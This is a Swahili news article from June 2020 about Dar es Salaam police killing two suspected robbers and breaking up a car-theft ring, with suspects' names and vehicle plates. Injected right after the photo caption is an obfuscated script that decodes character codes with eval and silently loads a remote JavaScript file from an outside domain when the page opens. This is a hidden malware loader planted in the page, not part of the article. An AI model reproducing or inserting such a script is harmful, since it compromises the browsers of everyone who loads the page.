Recent Comments

Polisi Dar yauwa Majambazi wawili

By Juma Issihaka Jun 26, 2020
<p>Kamanda wa Jeshi la Polisi Kanda Maalumu ya Dar es Salaam Lazzaro Mambosasa</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Kamanda wa Jeshi la Polisi Kanda Maalumu ya Dar es Salaam Lazzaro Mambosasa

JESHI la Polisi Kanda Maalumu ya Dar es Salaam, limewauwa majambazi wawili katika matukio tofauti kwa kipindi cha Mwezi Juni, wakati wakijaribu kupanga matukio ya uhalifu ikiwemo uvamizi katika maduka ya fedha.

Aidha Jeshi hilo limebainisha kuwa limefanikiwa kukamata mtandao wa wizi wa magari jijini Dar es Salaam uliokuwa ukiiba jijini humo na kuyauza katika mikoa mbalimbali nchini.

Akizungumza na Wanahabari jijini Dar es Salaam leo Kamanda wa Polisi wa kanda hiyo, Lazzaro Mambosasa, amesema matukio hayo yalifanywa katika kipindi cha mwezi Juni, maeneo tofauti jijini humo.

Amesema tukio la kwanza lilifanyika Juni 19 saa mbili usiku, eneno la Mbagala Zakhem, ambapo jeshi hilo lilifanikiwa kuzima tukio la ujambazi lililopangwa kufanyika katika maduka ya miamala ya kifedha.

“Baada ya Majambazi kustukia kuwa kuna polisi katika eneo hilo ndipo walipoanza kufyatua risasi ovyo na hatimaye jeshi hilo kufanikiwa kumpiga risasi ya mgongoni jambazi mmoja hadi kufariki,” amesema.

Amesema baada ya kumpekua jambazi huyo walimkuta na silaha aina ya bastola na risasi tano zilizokuwa ndani ya kasha, wakati majambazi wengine wawili walikimbia.

Ameongeza kuwa jitihada za kuwasaka majambazi waliokimbia bado zinaendelea hadi hapo watakapotiwa nguvuni na kwamba mwili wa yule waliyempiga risasi na kufariki umehifadhiwa katika Hospitali ya Taifa ya Muhimbili na uchunguzi unaendelea.

Mambosasa amesema mnamo Juni 13, mwaka huu saa nne usiku eneo la Shekilango karibu na Bandari Kavu jijini humo, kikosi kazi cha kupambana na ujambazi kilikuwa kinawafuatilia majambazi watatu waliokuwa wakitumia usafiri wa Bodaboda

Amesema baada ya majambazi hao kugundua kuwa walikuwa wakifuatiliwa na makachelo walianza kushambuliana nao kwa kufyatua risasi.

Amesema Polisi ilifanikiwa kumjeruhi kwa risasi jambazi mmoja ambaye baadae alifariki dunia baada ya kutokwa na damu nyingi kwenye jeraha hilo.

Ameongeza kuwa jambazi huyo anayekadiriwa kuwa na umri kati ya miaka 25 hadi 35 alikutwa na silaha aina ya Bastola aliyokuwa akiitumia kwenye shughuli za kihalifu.

Mambosasa amesema mwili wa jambazi huyo pia umehifadhiwa katika Hospitali ya Taifa ya Muhimbili na uchunguzi unaendelea ikiwemo wa kuwakamata wengine wawili waliokimbia.

Aidha kamanda huyo ameeleza kuwa jeshi hilo limefanikiwa kukamata mtandao wa wizi wa magari kutoka jijini Dar es Salaam na walikuwa wakiyauza mikoa mbalimbali nchini.

Amesema mtandao huo uliokuwa na watu watano waliojigawa katika mikoa mbalimbali nchini na kwamba huwa wanakutana Dar es Salaam kwa ajili ya kufanya uhalifu huo.

Amesema katika oparesheni hiyo wamefanikiwa kukamata magari matano ambayo ni Toyota Klugger lenye namba za usajili T425 DUE, Toyota Harrier lenye namba za usajili T162 DBU.

Mengine ni Toyota NOAH lenye namba za usajili T423 CFF, Toyota TOWN ACE lenye namba za usajili T761 CUL na Toyota IST lenye namba za usajili T999 DDF.

Amesema gari zote hizo zimehifadhiwa maeneo maalumu na kuongeza kuwa huu ni wakati wa wamiliki kujitokeza kwa ajili ya utambuzi na kuanza taratibu za Mahakama.

Mambosasa amewataja wezi hao waliowakamata kuwa ni Hatibu Mwinyi (35), Mkazi wa Katoro Geita, Onesfori Venance Massawe (28), Mkazi wa Kimara, Jabir Rajabu (40), Mkazi wa Nyamanoro Mwanza, Sanford Hezekia (41), Mkazi wa Nyakato Mhandu Mwanza na Nasir Said (44), Mkazi wa Bushushu Shinyanga.

Amesema oparesheni iliyofanikiwa kuwakamata wezi hao ilifanyika kuanzia Mei 28 hadi Juni 20 mwaka huu.

Ameongeza kuwa watuhumiwa wote wanaendelea kuhojiwa.

Pia Mambosasa ameeleza jeshi hilo imejipanga kudhibiti matukio yatakayohatarisha amani wakati wa uchaguzi unaotarajiwa kufanyika mwaka huu.

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.